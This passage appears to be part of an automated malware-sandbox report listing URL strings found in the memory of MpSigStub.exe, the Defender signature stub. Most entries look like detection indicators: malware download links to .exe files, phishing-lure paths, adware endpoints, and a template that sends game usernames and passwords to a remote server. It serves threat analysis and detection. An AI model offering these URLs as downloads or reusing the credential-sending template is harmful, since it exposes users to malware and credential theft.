Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://www.7sponsor.com/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://www.887766.com/hi.htm
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&lev
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.96333.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://www.9aaa.com
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://www.CollakeSoftware.com
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://www.CollakeSoftware.comg
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://www.DanlodBazar.blogfa.com
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	String found in binary or memory: http://www.IM-Names.com/names
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	String found in binary or memory: http://www.IM-Names.com/namesa
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp	String found in binary or memory: http://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp	String found in binary or memory: http://www.MalwareAlarm.com/
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.PCKeeper.com
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: http://www.PlanetCpp.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://www.Social2Search.com/privacy
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://www.advgoogle.blogdpot.com
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://www.agendagyn.com/media/fotos/2010/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://www.airmak.it/information.rar
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://www.ajanster.com/zuppe/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://www.al-enayah.com/ssfm
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: http://www.alanga.net/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.aldimarche.eu/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp	String found in binary or memory: http://www.alfa-search.com/home.html
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp	String found in binary or memory: http://www.alfa-search.com/search.html
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://www.allatori.com
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://www.alot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.alphadecimal.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.altayusa.com/ssl/js/prototype.js
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.alxup.com/bin/Up.ini
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://www.amentosx.com/script/r.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.andrewkarpie.com/sweat/secure/serve.php?protect=noefort)
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.antivirusxp2008.com
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/license-
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.appkyc6666.cn
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://www.applicablebeam.com/ddawdew/trjgje.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.ardamax.com
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.ardamax.com/keylogger/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://www.arfa.it/rechnung/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.asame.org/includes/js/dtree/img/474/mamb/pdf/pdf.htm)
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://www.asianraw.com/members/vs.html
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.ateliedeervas.com.br/scan/
Source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp	String found in binary or memory: http://www.avpro-labs.com/buy.html
Source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp	String found in binary or memory: http://www.avpro-labs.com/buy.htmlx
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://www.badu.cc
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.cn/baidu?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.cn/s?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/baidu?
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/baidu?tn=
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/cpro.php?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://www.bin32.com/check?id=1&ver=16
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://www.bitly.com/yeuiqwbdhasdvbhsagdhj%public%
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.blazehits.net/popup.
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.bliao.com/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://www.blizzard.com/support/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://www.blue-series.de
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.bluelook.es/bvvtbbh.php
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://www.bobozim.hpg.com.br/nohot.jpg
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.bokee.com/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://www.bonusesfound.ml/install/inst64.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://www.bonusesfound.ml/update/index.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://www.bookiq.bsnl.co.in/data_entry/circulars/m
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.boot-land.net/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://www.boukan.8m.net/AYO_Soft/Index.html
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://www.britishtotty.com/content/homepage.html
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.browserwise.com/d
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://www.busnuansa.my.id/pboojfzdzpub/8888888.png
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.cakedan.com/
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: http://www.calyeung.com/exec/wmapop.perl
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/app.php?url=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/install.php?
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/uninstall.php?
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/search/search.php
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/search/search.phpx
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: http://www.ccleaner.com
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://www.ccnnic.com/download/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://www.cepdep.org/csslb/graphics/outlines/registro-cita.php
Source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://www.cheathappens.com/trainer_troubleshooting_lite.asp
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://www.cheathappens.com/unauthorized/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://www.chmeditor.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://www.cinderella-movie.com/regist1.php?s=2&d=14&f=01
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://www.ckplayer.comutf-8
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://www.cleveradds.com/
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo1.exe
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo2.exe
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo3.exe
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.cmbchina.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.cmfu.com/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.coapr13south.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.coapr13south.com/download.php?xe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://www.codylindley.com)
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojulyfastdl.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojulyfastdl.com/download.php?x
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojune13coast.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.comar13west.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.comay13north.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.comay15coat.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.comegoto.com/host.jpg
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.comeinbaby.com/app/app.php?sn=%s&pn=%s&mn=%s&pv=%s&appid=%s&os=macservice&pt=%s&msn=%
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.comfm.com
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: http://www.comfm.comx;
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://www.commonname.com/find.asp?cn=
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://www.constructed.fi/
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	String found in binary or memory: http://www.consumerinput.com/
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	String found in binary or memory: http://www.consumerinput.com/xb
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooct13hen.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooctdlfast.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooctdlfast.com/download.php?x
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://www.copy9.com
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cosept13jetty.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cosept14water.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://www.ctuser.net
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://www.cultravel.it/invoice-number-
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://www.cxgr.com/codec/play/download/playmp3/
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://www.dandownload.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.dangdang.com/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.darxk.com/aviatic/systema.exe
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://www.davion.plus.com/iscyqz.html
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.daybt.com/query.asp?q=%s
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://www.dealply.com/faq/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.delta-homes.com/
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp	String found in binary or memory: http://www.desktopsmiley.com/toolbar/desktopsmiley/download/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://www.dhl.com/img/meta/dhl_logo.gif
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://www.dialerclub.com
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	String found in binary or memory: http://www.diannaowang.com:8080
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.dianping.com/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://www.diaochapai.com/survey/
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp	String found in binary or memory: http://www.direct-ip.com/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://www.distance24.org/route.json?stops=
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	String found in binary or memory: http://www.djapp.info/?domain=xa
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.dk-soft.org
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnangels.net/q2q/qqlong.asp
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://www.dosearches.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://www.doswf.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.down988.cn/2.htm?021width=0height=0
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.dsdsd.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/_poplkh
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/canview.txt
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/xh
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/count/updatedata.aspx?id=
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-mirrorsite.com/exit/movies1.html__
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-mirrorsite.com/exit/music
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.php
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.phpx
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.efixpctools.com
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://www.egy8.com
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://www.egy8.comx
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.elec-tb.com/tmp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://www.eomniform.com/OF5/nsplugins/OFMailX.cab
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp	String found in binary or memory: http://www.epoolsoft.com/pchunter/x
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.epoolstroi.ru/templates/im-start/css/fonts/canada%20post%20notice%20card.zip
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.esaof.edu.pt/templates/beez/images_general/xml/xiqueyhayudhxzzc.exe
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://www.ewrtw.pw/c/niubilityc.exe
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://www.exit7.net/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://www.eyuyan.com)
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	String found in binary or memory: http://www.f2ko.de
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://www.facebookikiziniz.com/ext/r.php
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com/affiliates/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com/affiliates/772465/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.fb.beirutmarathonculture.org/aos/aos/aos/index.htm)
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fbcom.review/d/10.doc
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://www.fbcom.review/d/9.doc
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fbi.gov/index.htm
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://www.fenomen-games.com/dhome.htm
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://www.fenomen-games.com/dhome.htmxM
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txt
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txtxN
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fixarabul.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fixarasana.com
